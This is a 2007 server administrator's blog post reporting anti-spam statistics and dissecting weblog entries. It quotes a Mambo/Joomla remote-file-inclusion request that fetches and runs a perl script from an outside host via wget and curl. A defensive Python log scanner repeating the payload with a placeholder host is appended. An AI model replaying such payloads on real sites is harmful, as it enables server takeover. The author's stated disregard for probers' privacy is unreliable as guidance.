17-Sep-2007

Anti-spam results
One full week of activity:

* Passed: 123 messages (either because the content was OK, or because the sender has explicitly been allowed, in which case no check is done)
* Quarantined: 110 messages, 8 false positives (of which a few are normally considered SPAM but I opted in)
* Discarded: 52, 4 false positives
* Blocked on RBL: 581 (in total; I did not filter off identical IP addresses – that wouldn’t have happened using the previous method)
* Relay attempts: 17 (apart from the two I did myself)

All in all it means that about 750 messages didn’t make it to VMS mail. That is, on average, 100 a day; 2/3 of them because the domain is blacklisted.

SMTP did discard a few messages by the configuration, mainly based on domain (gmail and hotmail for instance) but I removed these restrictions because the spam filter seems to be working pretty well.

This spam filtering has some side effects. None of them really serious.

Since these messages are no longer passed to the VMS SMTP client, they no longer show up in OPERATOR.LOG. As a result, the spam report that is updated daily won’t contain any new entries. That is reflected in this report: the anti-spam filter was put in place on 08-sep-2007, in the evening (when I installed the license and did some minimal configuration):

8-SEP-2007 18:56:55.54 CLNTINRBL 216.130.65.7
9-SEP-2007 00:15:04.78 UNRSLVMF cutie@mailroad.org
9-SEP-2007 10:08:24.36 UNRSLVMF kritzingerzndw@vnux.com
9-SEP-2007 11:25:32.34 BADMF fdophdi@gmail.com
9-SEP-2007 18:18:18.62 UNRSLVMF Schwabuuys@163data.com.cn
11-SEP-2007 02:33:18.76 UNRSLVMF Paulus_eobio@163data.com.cn
12-SEP-2007 15:20:45.53 BADMF sarah9dale@hotmail.com
13-SEP-2007 20:37:52.66 NOSPAMRLY 127.0.0.1 as suspected SPAM ramon@vennik.com
15-SEP-2007 18:54:53.86 UNRSLVMF sac10125@teensadolescentes.com
16-SEP-2007 20:46:22.79 UNRSLVMF kees@mirabilis.com

The last of the “old” config is the one on 8-sep-2007 18:56 – and PMAS came into effect at about 20:00.

On 13-sep-2007 I lifted the restrictions in the VMS SMTP server:

$ dir/dat tcpip$smtp_common:smtp.config

Directory SYS$SPECIFIC:[TCPIP$SMTP]

SMTP.CONFIG;58 13-SEP-2007 20:40:03.83
SMTP.CONFIG;57 12-SEP-2007 22:14:14.52
SMTP.CONFIG;56 5-JUL-2007 21:44:35.69

Total of 3 files.

So the one on that day is actually correct: the configuration file was changed after that message was received. Because SMTP had to be stopped and restarted, it’s even later than the file date.

Why the last two slipped through the filter, I don’t know. Neither of them can be found in the PMAS logging, so they have not passed the normal route. They haven’t come from the webserver either – there is no hit in any of the logs for these timestamps.

The good news is that Operator.log is no longer poisoned with these messages, causing a drastic decrease in size. It’s now about half the size it used to be.

The third side-effect will be that phishing attempts – like the ones I got from E[B/D]ay, Paypal and banks – won’t make it either. If they end up in quarantine or are discarded, I could still pick them up. But quite likely, their spamicity is so high (> 500) that they will be rejected anyway.

Side effects of changing web structure
Changes in the web structure should be taken into account when scanning the weblogs – and that is something I forgot. So the report on rejected calls contains a great many actually valid accesses. Because the scan reads all present files and creates a full new report, I could update the script and rerun it to create new logs. And I found that a few lines seem to be far too long to process:

19:08:48.60 > Read 1000, Written 3
%DCL-W-TKNOVF, command element is too long - shorten
\212.72.162.197 - - [28/Aug/2007:08:56:18 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_c
ontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstar
%DCL-W-TKNOVF, command element is too long - shorten
\212.72.162.197 - - [28/Aug/2007:08:56:19 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstaro
%DCL-W-TKNOVF, command element is too long - shorten
\212.72.162.197 - - [28/Aug/2007:08:56:20 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstaronline.com/https%20;perl%20https%20;c
19:08:53.18 > Read 2000, Written 16

A little problem to be solved ;), it seems the longest records don’t fit:

Record format: Stream_LF, maximum 0 bytes, longest 731 bytes
Record attributes: Carriage return carriage control

That would not be a problem, would it?

I tried assigning a value to a symbol and that’s not a problem – I can add up to about 4000 bytes. So there is a difference in maximum size between directly assigning a value and reading one from a file.

It’s rather seldom, so don’t bother too much...

What was attempted: the GET refers to a different file in each case:

GET /index2.php?
option=com_content&
do_pdf=1&
id=1index2.php?
....
GET /index.php?
option=com_content&
do_pdf=1&
id=1index2.php?
....
GET /mambo/index2.php?
....

but the code is the same in all three (it’s all on one line; for clarity, I split it up):

_REQUEST[option]=com_content&
_REQUEST[Itemid]=1&
GLOBALS=&
mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&
cmd=cd%20/tmp;
wget%20ryanstaronline.com/https%20;
perl%20https%20;
curl%20-o%20http://ryanstaronline.com/https%20;
perl%20https;
%20;
echo%20YYY;
echo

w00tw00t*
A file that is often pushed or requested is named “w00tw00t.at.isc.sans.<something>”. It doesn’t exist, of course. At least, it didn’t: I created one, for fun, to scare the kiddies off, to start with. Of course it doesn’t do them any harm, for the time being: I may add some code to gather as much data as possible and store it for reference and, in particular cases, pass it on to the authorities. Not that it would help much, but they ask for it.
(Am I allowed to do so? Probably not, but I don’t care. I have enough indication that a file with this signature is often used to indicate an attempt to compromise the webserver. I don’t accept this and consider all rights to privacy of the individual void and of no value)
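As an added example (not the author’s DCL script, nor PMAS code), here is a small Python scanner for the two kinds of entries discussed above: the remote-include GETs with the `mosConfig_absolute_path` / `GLOBALS` / `cmd` parameters, and the `w00tw00t.at.isc.sans` probes. It assumes a combined-log-format file, has no record-length limit (so the 731-byte lines are not a problem), and the sample lines, client addresses and attacker host are constructed placeholders, not the real ones from the post.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines modelled on the entries quoted in the post; the
# client addresses and the attacker host are documentation placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Aug/2007:08:56:18 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/cmd.txt?&cmd=cd%20/tmp;wget%20attacker.example/https%20;perl%20https%20;echo%20YYY;echo HTTP/1.1" 404 1050
192.0.2.10 - - [28/Aug/2007:08:56:20 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/cmd.txt? HTTP/1.1" 404 1050
198.51.100.7 - - [28/Aug/2007:09:01:02 +0100] "GET /w00tw00t.at.isc.sans.placeholder HTTP/1.1" 404 0
203.0.113.5 - - [28/Aug/2007:09:02:00 +0100] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5123
"""

# Combined log format: client, identd, user, [timestamp], "request", status, size
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+')
# Downloader/interpreter names seen in the decoded cmd= value of the post
SHELL_RE = re.compile(r'\b(wget|curl|perl)\b')

def query_params(target):
    """Split the query on '&' only and decode %XX escapes. Done by hand rather than
    with parse_qsl so a literal ';' inside a value (as in cmd=) stays part of it."""
    params = []
    for pair in urlsplit(target).query.split('&'):
        if pair:
            key, _, value = pair.partition('=')
            params.append((unquote(key), unquote(value)))
    return params

def classify(line):
    """Return (client, timestamp, sorted tags) for one line; tags == [] means clean."""
    m = LINE_RE.match(line)
    if not m:
        return (None, None, ['unparsed'])   # too mangled to trust, report it anyway
    target = m.group('target')
    tags = set()
    if urlsplit(target).path.lower().startswith('/w00tw00t.at.isc.sans'):
        tags.add('scanner_probe')
    for key, value in query_params(target):
        if key == 'GLOBALS' or key.startswith('_REQUEST['):
            tags.add('globals_override')          # trying to set PHP superglobals
        if re.match(r'(?i)(https?|ftp)://', value):
            tags.add('remote_include:' + key)     # a URL where a local path belongs
        if key == 'cmd' or SHELL_RE.search(value):
            tags.add('command_injection')
    return (m.group('ip'), m.group('ts'), sorted(tags))

def scan(log_text):
    """Group every suspicious line by client address; clean lines are dropped."""
    hits = {}
    for line in log_text.splitlines():
        ip, ts, tags = classify(line)
        if tags:
            hits.setdefault(ip, []).append((ts, tags))
    return hits
```

Feeding the real access log through `scan()` gives one entry per probing client, which is the data the post says it wants to keep for reference.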